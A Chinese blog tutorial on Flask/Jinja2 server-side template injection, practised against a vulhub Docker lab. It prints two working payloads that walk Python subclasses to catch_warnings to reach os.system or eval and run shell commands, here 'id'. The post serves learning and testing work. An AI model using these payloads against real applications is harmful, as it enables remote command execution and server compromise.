Flask(Jinja2) 服务端模板注入漏洞

最新推荐文章于 2024-02-03 16:51:45 发布
最新推荐文章于 2024-02-03 16:51:45 发布
阅读量6.4k 收藏 5
点赞数 1
分类专栏: python小记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lansatiankongxxc/article/details/78764726
版权

其实我根本没用过flask模板,但是最近在学习python,研究下划线,莫名其妙地就学习到这里了。

首先搭建一个flask环境。在github上下一个docker
https://github.com/vulhub/vulhub/tree/master/flask/ssti
然后运行docker

先来看一下代码:
这里写图片描述
由此,在浏览器中输入

 http://your-ip/?name=leaf

会出现 hello leaf
但在name后面也可以输入其他东西,比如:

 http://your-ip/?name={{1*1}}

出现 hello 1

 http://your-ip/?name={{'aaa'.upper()}}

出现AAA

由此就有大神找出了任意命令执行的方法了。
在python里要执行系统命令需要import os模块。

想要在模板中直接调用内置模块 os,即需要在模板环境中对其注册

需要在上面的代码里加一句:

t.globals['os'] = os

如果没有加这一句,直接使用os中的方法会报错。
那么,如何在未注册 os 模块的情况下在模板中调用 popen() 函数执行系统命令呢?这就用到之前研究的各种下划线函数了。

先看下面的代码:
这里写图片描述
由此可以访问到很多其他模块,os模块自然也可以这样访问到。

查阅的其他资料,访问os模块都是从warnings.catch_warnings模块入手的。看一下catch_warnings在哪个位置。
这里写图片描述
知道了位置后,再用func_global看看该模块有哪些global函数
这里写图片描述
这里能看到linecache,我们要访问的os模块就在这里,看看这个模块的各种属性:
这里写图片描述
就能看到os模块了(图片太大,不贴了)。
既然找到了os,接下来就是使用它了。
这里写图片描述
现在看看怎么在Jinja2中直接构造命令执行代码,我对Jinja2还不算很熟悉,这里先放上两段大神的代码:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{{c.__init__.func_globals['linecache'].__dict__['os'].system('id') }}
{% endif %}
{% endfor %}

当然也可以用eval函数,代码如下:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

最后放到浏览器里注意要url编码,就可以命令执行了
这里写图片描述

参考:https://github.com/vulhub/vulhub/tree/master/flask/ssti
http://rickgray.me/use-python-features-to-execute-arbitrary-codes-in-jinja2-templates

lansatiankong
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
flask框架jinja2模板模板继承实例分析
09-18
主要介绍了flask框架jinja2模板模板继承,结合实例形式分析了flask框架jinja2模板的基本用法与模板继承相关实现技巧,需要的朋友可以参考下
flask框架漏洞
JJT
05-14 4743
在ctf里遇到了关于flask框架漏洞的题,此篇博文较为详细 转自https://www.jianshu.com/p/56614e46093e 一、简介 Flask 是一个使用 Python 编写的轻量级 Web 应用框架。Flask 依赖两个外部库: Jinja2模板引擎和WSGI 工具集。 1、常用概念 WSGI 只是一种接口,它只适用于 Python 语言,其全称为 Web Server Gateway Interface,定义了 web服务器和 web应用之间的接口规范。也就是说,只要 w.
[python]浅谈Flask的SSTI漏洞
记录学习,一起进步
04-03 1120
[python]浅谈Flask的SSTI漏洞
Python flask 模板详解
最新发布
鱼丸丶粗面
02-03 1443
Python flask 模板详解
Flask SSTI漏洞介绍及利用
JCPS_Y的博客
10-23 2575
Flask SSTI漏洞介绍及利用
FlaskJinja2服务端模板注入漏洞(SSTI)整理
qq_46145027的博客
04-19 1174
整理一下Flask框架下的SSTI漏洞相关知识
【WEB攻防】Flask(Jinja2) 服务端模板注入漏洞 原理+防御
AAAAAAAAAAAA66的博客
12-19 5768
前面写CTF题目的时候做过几道SSTI模板注入的题目。最近又遇到了一个不错的CTF网站, http://bmzclub.cn 里面不但有CTF题目,更重要的是有漏洞环境,不需要自己去一个一个去安装,对于我这样的懒人简直是福音。 目录 Flask模板注入简介 FlaskJinja2介绍: 注入原理 复现 手动注入 工具探测 Flask模板注入简介 FlaskJinja2介绍: 1.Flask是一个轻量级的基于Python的web框架。 2.Jinja 模板只是一个属于.
Flask模板引擎之Jinja2语法介绍
01-20
Jinja是组成Flask模板引擎。可能你还不太了解它是干嘛的,但你对下面这些百分号和大括号肯定不陌生: {% block body %} {% for user in users %} <li><a>{{ user.username }}</a></li> {% endfor %} {% ...
Flask模板引擎Jinja2使用实例
09-17
主要介绍了Flask模板引擎Jinja2使用实例,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Python的Flask框架中的Jinja2模板引擎学习教程
09-21
主要介绍了Python的Flask框架中的Jinja2模板引擎学习教程,Jinja2模板引擎的用法也是Flask的Web开发中的重要知识,需要的朋友可以参考下
Flask框架漏洞:SSTI
glass_york的博客
12-01 1054
SSTI 是 Server-Side Template Injection即 服务端模板注入,它是一种安全漏洞攻击技术。当应用程序在服务器端使用模板引擎来呈现动态生成的内容时,如果用户可以控制模板引擎的输入,就可能导致 SSTI 漏洞。在正常情况下,模板引擎被设计用于安全地将预定义的模板与数据进行组合,生成最终的输出。但是,SSTI 漏洞允许攻击者在应用程序的上下文中执行任意的服务器端代码。当攻击者能够通过用户输入或其他外部来源插入恶意的模板代码时,就会产生一系列问题。
Flask服务端模板(Jinja2) SSTI 注入漏洞
weixin_51387754的博客
11-22 1420
漏洞简介 flask/ssti漏洞,即: FlaskJinja2服务端模板注入漏洞(SSTI)。Flask 是一个使用 Python 编写的轻量级 Web 应用框架,Flask 为你提供工具,库和技术来允许你构建一个 web 应用程序。这个 web 应用程序可以是一些 web 页面、博客、wiki、基于 web 的日历应用或商业网站。Jinja 2是一种面向Python的现代和设计友好的模板语言。 影响版本 使用Flask框架开发并且使用Jinja2模板引擎,最重要的是模板内容可控。满足该条件的Fla
Flask框架中常规漏洞防范方法
ALLEN'Blog
01-05 677
Double Fetch是一种条件竞争类型的漏洞,其主要形成的原因是由于用户态与内核态之间的数据在进行交互时存在时间差,我们在先前的学习中有了解到内核在从用户态中获取数据时会使用函数copy_from_user,而如果要拷贝的数据过于复杂的话则内核会选择引用其指针而将数据暂存于用户态中等待后续处理,而在这时数据会存在被条件竞争修改原有数据的风险,也就是笔者要分享的Double Fetch的由来。
[CTF的PASSBY]浅谈FLASK-jinja2 SSTI 的绕过
qq_64201116的博客
07-04 2043
我目前了解的后端的三大语言,基于php,基于java,基于python,这篇文章就来浅浅谈谈关于python构造的flask过滤SSTI不严谨导致的SSTI注入
flask SSTI漏洞
jiet07的博客
08-07 3872
文章目录第一章flask ssti漏洞的代码(长什么样子)第二章 前言(基础知识储备)第三章 服务器端模板(SST)第四章 服务器模板注入(SSTI)第五章 例子(CTF)第五章 如何防御服务器模板注入参考资料附录 第一章flask ssti漏洞的代码(长什么样子) 1.1 代码 from flask import Flask from flask import request from flask import render_template_string from flask import render
Flask 模板注入漏洞
战神/calmness的博客
12-08 1391
目录 描述 环境安装flask 原理 沙盒逃逸方式进行命令执行 直接通过GET方式进行命令执行 过程 描述 Flask(也被称为“microframework”) 是一个微型的Python开发的Web框架,基于Werkzeug WSGI工具箱和Jinja2 模板引擎。 Flask使用起来非常简单,应用Extension增加其他功能:ORM、窗体验证工具、文件上传、各种开放式身份验证技术。 环境安装flask >>> pip3 install Flask >&
flask jinja2模板渲染用法有哪些
02-06
Flask 是一个 Python 的 Web 框架,Jinja2Flask 所用的模板引擎。 在使用 FlaskJinja2 渲染模板时,需要先在 Flask 应用中配置 Jinja2 模板引擎,然后在视图函数中使用 render_template() 方法渲染模板。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值